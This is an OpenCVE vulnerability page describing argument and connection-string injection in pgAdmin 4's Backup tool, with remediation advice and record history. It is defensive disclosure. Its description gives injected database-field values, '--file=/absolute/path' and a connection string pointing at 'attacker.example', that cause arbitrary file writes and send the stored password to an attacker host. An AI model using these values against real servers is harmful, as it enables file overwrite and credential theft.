Description
pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/<sid>/object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user's File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin's own configuration database and, depending on the target chosen, be escalated further.

The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as 'host=attacker.example port=5432 dbname=x' redirected pg_dump to a server of the attacker's choosing. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection carries that credential to the attacker-nominated endpoint. Both behaviours are reachable by any authenticated user holding the tools_backup permission, which is granted to the default User role.

The fix stops passing the database name through the argument vector altogether and supplies it in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. This matches the approach already used by the Import/Export tool. Regression tests assert that the database name is absent from the constructed argument vector and that PGDATABASE carries the exact requested value.

This issue affects pgAdmin 4: from the introduction of the trailing positional database argument in the Backup tool before 9.18.
Published: 2026-09-17
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: Arbitrary file creation and credential leakage
Action: Patch
AI Analysis

Impact

pgAdmin 4’s Backup tool improperly appended the client‑supplied database field directly to the pg_dump argument list, allowing values that begin with a dash to be interpreted as operational options. A value such as --file=/absolute/path overrode the tool’s intended location, permitting an attacker to write files anywhere the pgAdmin process could access. Additionally, the field was vulnerable to connection‑string injection; libpq interpreted a database name containing an equals sign as a full connection string, enabling redirection of pg_dump to an attacker‑controlled server. Because pgAdmin exported the decrypted database password into the environment variable PGPASSWORD before executing pg_dump, the sensitive credential was sent to the attacker’s endpoint. These behaviors expose serious confidentiality, integrity, and availability risks, including arbitrary file overwrite and potential escalation of privileges when the overwritten resources belong to pgAdmin’s configuration.

Affected Systems

The vulnerability exists in pgAdmin 4 from the introduction of the trailing positional database argument in the Backup tool before version 9.18. Affected vendors and products identified by the CNA are pgadmin.org’s pgAdmin 4. All earlier releases before 9.18 are susceptible.

Risk and Exploitability

The vulnerability has a CVSS score of 8.7, with no EPSS score available and it is not listed in the CISA KEV catalog. The attack requires a legitimate user account that has the tools_backup permission, which is granted by default to the User role. An attacker can therefore exploit the flaw by submitting a crafted request to the /backup/job/<sid>/object API. The inferred attack vector is a remote web‑interface interaction with authenticated access, and any user with the necessary permission can deliver the exploit. Taken together, the high CVSS score and availability of a direct exploit path underscore that the vulnerability poses a significant risk to affected installations.

Generated by OpenCVE AI on September 17, 2026 at 20:26 UTC.

Remediation

No solution or workaround provided in the CVE record.

OpenCVE Recommended Actions

  • Apply the official patch that stops passing the database name through the argument vector and sets it in the PGDATABASE environment variable – this fix is available in pgAdmin 4 version 9.18 and later.
  • If upgrading is not immediately possible, remove or restrict the tools_backup permission from all non‑administrative users to limit the ability to trigger the vulnerable backup function.
  • Ensure that the operating‑system account running pgAdmin has constrained file‑write permissions, preventing arbitrary file placement even if the vulnerability is triggered but actions are limited.

Generated by OpenCVE AI on September 17, 2026 at 20:26 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 21 Sep 2026 17:45:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:*

Fri, 18 Sep 2026 00:15:00 +0000

Type Values Removed Values Added
References
Metrics threat_severity

None

threat_severity

Important


Thu, 17 Sep 2026 20:45:00 +0000

Type Values Removed Values Added
First Time appeared Pgadmin
Pgadmin pgadmin 4
Vendors & Products Pgadmin
Pgadmin pgadmin 4

Thu, 17 Sep 2026 16:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Thu, 17 Sep 2026 15:45:00 +0000

Type Values Removed Values Added
Description pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/<sid>/object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user's File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin's own configuration database and, depending on the target chosen, be escalated further. The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as 'host=attacker.example port=5432 dbname=x' redirected pg_dump to a server of the attacker's choosing. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection carries that credential to the attacker-nominated endpoint. Both behaviours are reachable by any authenticated user holding the tools_backup permission, which is granted to the default User role. The fix stops passing the database name through the argument vector altogether and supplies it in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. This matches the approach already used by the Import/Export tool. Regression tests assert that the database name is absent from the constructed argument vector and that PGDATABASE carries the exact requested value. This issue affects pgAdmin 4: from the introduction of the trailing positional database argument in the Backup tool before 9.18.
Title pgAdmin 4: Argument and connection-string injection via the database field in the Backup tool
Weaknesses CWE-22
CWE-88
References
Metrics cvssV3_1

{'score': 8.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}

cvssV4_0

{'score': 8.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}


Subscriptions

Pgadmin Pgadmin 4
cve-icon MITRE

Status: PUBLISHED

Assigner: PostgreSQL

Published:

Updated: 2026-09-17T16:00:02.215Z

Reserved: 2026-09-08T15:47:05.996Z

Link: CVE-2026-86864

cve-icon Vulnrichment

Updated: 2026-09-17T15:59:56.519Z

cve-icon NVD

Status : Analyzed

Published: 2026-09-17T16:18:18.010

Modified: 2026-09-21T17:27:38.967

Link: CVE-2026-86864

cve-icon Redhat

Severity : Important

Publid Date: 2026-09-17T15:31:00Z

Links: CVE-2026-86864 - Bugzilla

cve-icon OpenCVE Enrichment

Updated: 2026-09-17T20:30:17Z

Weaknesses
  • CWE-22

    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

  • CWE-88

    Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')